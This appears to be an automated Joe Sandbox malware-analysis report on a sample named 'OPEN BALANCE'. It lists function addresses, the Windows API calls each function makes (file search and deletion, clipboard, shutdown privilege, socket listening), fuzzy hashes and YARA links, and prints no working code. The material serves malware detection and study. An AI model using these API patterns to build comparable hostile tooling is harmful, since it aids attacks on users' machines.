Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: 7f6dd35e5dc12a81c58ebd765b089eea6551e92511fd3be2846d07e62039f44b
Instruction ID: ea21b418d9bb072c24ae2a92e008733b1f7ea389596a98626b85a24dce25f6ad
Opcode Fuzzy Hash: 7f6dd35e5dc12a81c58ebd765b089eea6551e92511fd3be2846d07e62039f44b
Instruction Fuzzy Hash: 2231B07254121A6EDB14AFB4DC48ADE77ACFF49320F104256EA55E22A0EB34D984CA54

Function 008D8D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windownativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00859BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00859BB2

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 008D8D5A
GetFocus.USER32 ref: 008D8D6A
GetDlgCtrlID.USER32(00000000), ref: 008D8D75
NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 008D8E1D
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 008D8ECF
GetMenuItemCount.USER32(?), ref: 008D8EEC
GetMenuItemID.USER32(?,00000000), ref: 008D8EFC
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 008D8F2E
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 008D8F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 008D8FA1

Strings

0, xrefs: 008D8E9F

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow
String ID: 0
API String ID: 1669892757-4108050209
Opcode ID: ce86c3f0f02515a8e25a8bd6b59559881b352b0f433566f29374079057cd30d4
Instruction ID: 041cbc2310c6f931de49fd408f42e9db19aeda5ff4d2d66f20766de4a8d94813
Opcode Fuzzy Hash: ce86c3f0f02515a8e25a8bd6b59559881b352b0f433566f29374079057cd30d4
Instruction Fuzzy Hash: 00818B71508305EFDB10CF28D884AABBBE9FB88754F140B5AF995D7291DB30D900CBA2

Function 008B979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 008B97BE
FindNextFileW.KERNEL32(00000000,?), ref: 008B9819
FindClose.KERNEL32(00000000), ref: 008B9824
FindFirstFileW.KERNEL32(*.*,?), ref: 008B9840
SetCurrentDirectoryW.KERNEL32(?), ref: 008B9890
SetCurrentDirectoryW.KERNEL32(00906B7C), ref: 008B98AE
FindNextFileW.KERNEL32(00000000,00000010), ref: 008B98B8
FindClose.KERNEL32(00000000), ref: 008B98C5
FindClose.KERNEL32(00000000), ref: 008B98D5

Part of subcall function 008ADAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 008ADB00

Strings

*.*, xrefs: 008B983B

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: 9eb1f24805b9183125d0fbe680e961f5839d1d910d99636fc75d5a9163cf164e
Instruction ID: a1fb49ddb5f96d1d27e17b3068d46a9184f2b5abafca81370a9a3685e214c485
Opcode Fuzzy Hash: 9eb1f24805b9183125d0fbe680e961f5839d1d910d99636fc75d5a9163cf164e
Instruction Fuzzy Hash: 0231D47150161A6EDF10EFB8DC48ADE77BCFF46324F104266EA94E22E0DB31D984CA64

Function 008B8195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 008B8257
SystemTimeToFileTime.KERNEL32(?,?), ref: 008B8267
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 008B8273
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008B8310
SetCurrentDirectoryW.KERNEL32(?), ref: 008B8324
SetCurrentDirectoryW.KERNEL32(?), ref: 008B8356
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 008B838C
SetCurrentDirectoryW.KERNEL32(?), ref: 008B8395

Strings

*.*, xrefs: 008B839B

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 1145eeb76d5173c3c610a33768aecffc55b2317a9382cb122b51edd6f3835b7b
Instruction ID: dd6710e6f6fdf73ab742d3b482c86c45ead620031b6a5c177d2883458af9b6d2
Opcode Fuzzy Hash: 1145eeb76d5173c3c610a33768aecffc55b2317a9382cb122b51edd6f3835b7b
Instruction Fuzzy Hash: A06147725083499FCB10EF68C8449AEB3ECFF89314F04891AF999C7251EB31E945CB92

Function 008AD076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00843AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00843A97,?,?,00842E7F,?,?,?,00000000), ref: 00843AC2

Part of subcall function 008AE199: GetFileAttributesW.KERNEL32(?,008ACF95), ref: 008AE19A

FindFirstFileW.KERNEL32(?,?), ref: 008AD122
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 008AD1DD
MoveFileW.KERNEL32(?,?), ref: 008AD1F0
DeleteFileW.KERNEL32(?,?,?,?), ref: 008AD20D
FindNextFileW.KERNEL32(00000000,00000010), ref: 008AD237

Part of subcall function 008AD29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,008AD21C,?,?), ref: 008AD2B2

FindClose.KERNEL32(00000000,?,?,?), ref: 008AD253
FindClose.KERNEL32(00000000), ref: 008AD264

Strings

\*.*, xrefs: 008AD0CD, 008AD0D6, 008AD0EB

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: 0c6325c624aed2c24d4412c10cd1183e5707e01e62d867fc01b535058b08e322
Instruction ID: fbae935ad2db41fc9e2f7eda72d56cdd0271cdb6d849381be305d25899db6896
Opcode Fuzzy Hash: 0c6325c624aed2c24d4412c10cd1183e5707e01e62d867fc01b535058b08e322
Instruction Fuzzy Hash: 09615D3184120D9ADF15EBA8D992AEEBB75FF56300F204165E442F7592EB306F09CB62

Function 008BED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 008BED91
EmptyClipboard.USER32 ref: 008BED97
GlobalAlloc.KERNEL32(00000002,?), ref: 008BEDAC
CloseClipboard.USER32 ref: 008BEEA3

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 7efee1f878341bc2f3eb8e398d6c2e820ead0298a46d2451b82b51ce59514188
Instruction ID: 1a3e4a9cde250753f3268e60bbc67f8b636223512811d12e0447ee66132eb192
Opcode Fuzzy Hash: 7efee1f878341bc2f3eb8e398d6c2e820ead0298a46d2451b82b51ce59514188
Instruction Fuzzy Hash: 48419C35205612AFE720DF19E888B99BBE5FF44318F14C19AE429CB762C775EC42CB90

Function 008AE8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 008A16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008A170D
Part of subcall function 008A16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008A173A
Part of subcall function 008A16C3: GetLastError.KERNEL32 ref: 008A174A

ExitWindowsEx.USER32(?,00000000), ref: 008AE932

Strings

SeShutdownPrivilege, xrefs: 008AE902
, xrefs: 008AE920
@, xrefs: 008AE925
, xrefs: 008AE95C

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: 0bb634dfc10d5a2b7c86ba1af838e6f94fec9c8476b17a5b37a2773f1b66d7df
Instruction ID: c428b5fb9b9d4de423fe994d2e420233a10b8c73b96dbf20d474b166e91451c4
Opcode Fuzzy Hash: 0bb634dfc10d5a2b7c86ba1af838e6f94fec9c8476b17a5b37a2773f1b66d7df
Instruction Fuzzy Hash: EB012632610315ABFB1426B89C8ABBB77ACFB16754F180D22F812E25D1D6A05C4081A0

Function 008C1204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000001,00000006), ref: 008C1276
WSAGetLastError.WS2_32 ref: 008C1283
bind.WS2_32(00000000,?,00000010), ref: 008C12BA
WSAGetLastError.WS2_32 ref: 008C12C5
closesocket.WS2_32(00000000), ref: 008C12F4
listen.WS2_32(00000000,00000005), ref: 008C1303
WSAGetLastError.WS2_32 ref: 008C130D
closesocket.WS2_32(00000000), ref: 008C133C

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: 69b3e9a86c6d59e829b68ca5ff91c8e6fe63a6714260c45a865249ca9fc0b91f
Instruction ID: 15bbc6069aae1b8326a985f84d67b197239622c2a513039a1a209b0430b6316b
Opcode Fuzzy Hash: 69b3e9a86c6d59e829b68ca5ff91c8e6fe63a6714260c45a865249ca9fc0b91f
Instruction Fuzzy Hash: 41415A35A001419FDB10DF28C488F29BBF5FB46318F18819DE8568B297C771EC81CBA1

Function 0087B952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0087B9D4
_free.LIBCMT ref: 0087B9F8
_free.LIBCMT ref: 0087BB7F
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,008E3700), ref: 0087BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,0091121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0087BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,00911270,000000FF,?,0000003F,00000000,?), ref: 0087BC36
_free.LIBCMT ref: 0087BD4B

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: 22088a96833d9a751fae10d9b158d3a316f828db57e79c2590666f10b1c907af
Instruction ID: b46ef6af88a5611011912fcc00d2cf0c9434b18bf9fbd14093a5d1d8cbf98086
Opcode Fuzzy Hash: 22088a96833d9a751fae10d9b158d3a316f828db57e79c2590666f10b1c907af
Instruction Fuzzy Hash: A8C12B71A04219AFCB25EF788C41BAABBBAFF41320F14C55AE558D7259E730CE41C751

Function 008D8B02 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 149nativewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00859BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00859BB2

Part of subcall function 0085912D: GetCursorPos.USER32(?), ref: 00859141
Part of subcall function 0085912D: ScreenToClient.USER32(00000000,?), ref: 0085915E
Part of subcall function 0085912D: GetAsyncKeyState.USER32(00000001), ref: 00859183
Part of subcall function 0085912D: GetAsyncKeyState.USER32(00000002), ref: 0085919D

ReleaseCapture.USER32 ref: 008D8B77
SetWindowTextW.USER32(?,00000000), ref: 008D8C12
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 008D8C25
NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 008D8CFF

Strings

@GUI_DROPID, xrefs: 008D8C51
@GUI_DRAGFILE, xrefs: 008D8C9A

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 973565025-2107944366
Opcode ID: d2c84775591a7c7a0be07b5d483a7a9e8aae51ea6e64dccb74637aa0cfee8ee0
Instruction ID: 4471190d3589f0e33f3c50c8b84e50bf57cf3640d4c06b53850d1bca4e21e728
Opcode Fuzzy Hash: d2c84775591a7c7a0be07b5d483a7a9e8aae51ea6e64dccb74637aa0cfee8ee0
Instruction Fuzzy Hash: 59517B70205304AFD714DF18DC96FAA77E4FB88754F40062EFAA6972E1DB709944CB62

Function 008AD3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00843AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00843A97,?,?,00842E7F,?,?,?,00000000), ref: 00843AC2

Part of subcall function 008AE199: GetFileAttributesW.KERNEL32(?,008ACF95), ref: 008AE19A

FindFirstFileW.KERNEL32(?,?), ref: 008AD420
DeleteFileW.KERNEL32(?,?,?,?), ref: 008AD470
FindNextFileW.KERNEL32(00000000,00000010), ref: 008AD481
FindClose.KERNEL32(00000000), ref: 008AD498
FindClose.KERNEL32(00000000), ref: 008AD4A1

Strings

\*.*, xrefs: 008AD3F2

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 03008c6cd81c04f858e8b44a25dcd3fa5d8286b3d462a18b607389e0cdc27140
Instruction ID: 82fdfead8ead7a10110ea083bf7cf762680508e6db4adbc8db3c8a718c143789
Opcode Fuzzy Hash: 03008c6cd81c04f858e8b44a25dcd3fa5d8286b3d462a18b607389e0cdc27140
Instruction Fuzzy Hash: 633182710093499FD304EF68D8558AFBBA8FE96304F444A1EF4D2D3591EB30AA09C767

Function 0087E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0087E645

Strings

1#IND, xrefs: 0087F83D
1#INF, xrefs: 0087F852
1#SNAN, xrefs: 0087F844
1#QNAN, xrefs: 0087F84B

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 4952dc6ebacc5d2e18e620d93af4f6a1cee4ddcb1475f0af80a324a4e704e324
Instruction ID: 7ea4bef2345aad388a70856368a4d29b4ec05bd87566d88effd960c5f9f15392
Opcode Fuzzy Hash: 4952dc6ebacc5d2e18e620d93af4f6a1cee4ddcb1475f0af80a324a4e704e324
Instruction Fuzzy Hash: 07C24972E086288FDB25CE28DD407EAB7B5FB49304F1481EAD94DE7245E774AE818F41

Function 008C22DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 008C22E8

Part of subcall function 008BE4EC: GetWindowRect.USER32(?,?), ref: 008BE504

GetDesktopWindow.USER32 ref: 008C2312
GetWindowRect.USER32(00000000), ref: 008C2319
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 008C2355
GetCursorPos.USER32(?), ref: 008C2381
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 008C23DF

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: ca6d267e2aa7ab985d1fc13eec1a0bec22d44b1044cc1f8399a553ed66f97309
Instruction ID: 948cbee25bdb99ee49ad75153cc1bfb617929246538d49ead82b759dae729d08
Opcode Fuzzy Hash: ca6d267e2aa7ab985d1fc13eec1a0bec22d44b1044cc1f8399a553ed66f97309
Instruction Fuzzy Hash: C631DE72105346ABD720DF28D844F9BBBA9FB84714F000A1EF884D7291DA34E908CB92

Function 008B9B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00849CB3: _wcslen.LIBCMT ref: 00849CBD

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 008B9B78
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 008B9C8B

Part of subcall function 008B3874: GetInputState.USER32 ref: 008B38CB
Part of subcall function 008B3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008B3966

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 008B9BA8
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 008B9C75

Strings

*.*, xrefs: 008B9B5D

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: 8b3a030099cf58a2fed6fc73b2d6d26f1069328615dfc007d972da8ce11dcb53
Instruction ID: d19bd78709f5b126ca66dd5cd9dbcc4ef44fef75c964dc0af4abadeaa9b4d36f
Opcode Fuzzy Hash: 8b3a030099cf58a2fed6fc73b2d6d26f1069328615dfc007d972da8ce11dcb53
Instruction Fuzzy Hash: EE41517194420A9FDF14DFA8C899AEE7BB4FF05310F244156E545E3291EB309E84CF61

Function 0085997D Relevance: 7.9, APIs: 5, Instructions: 375nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00859BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00859BB2

NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 00859A4E
GetSysColor.USER32(0000000F), ref: 00859B23
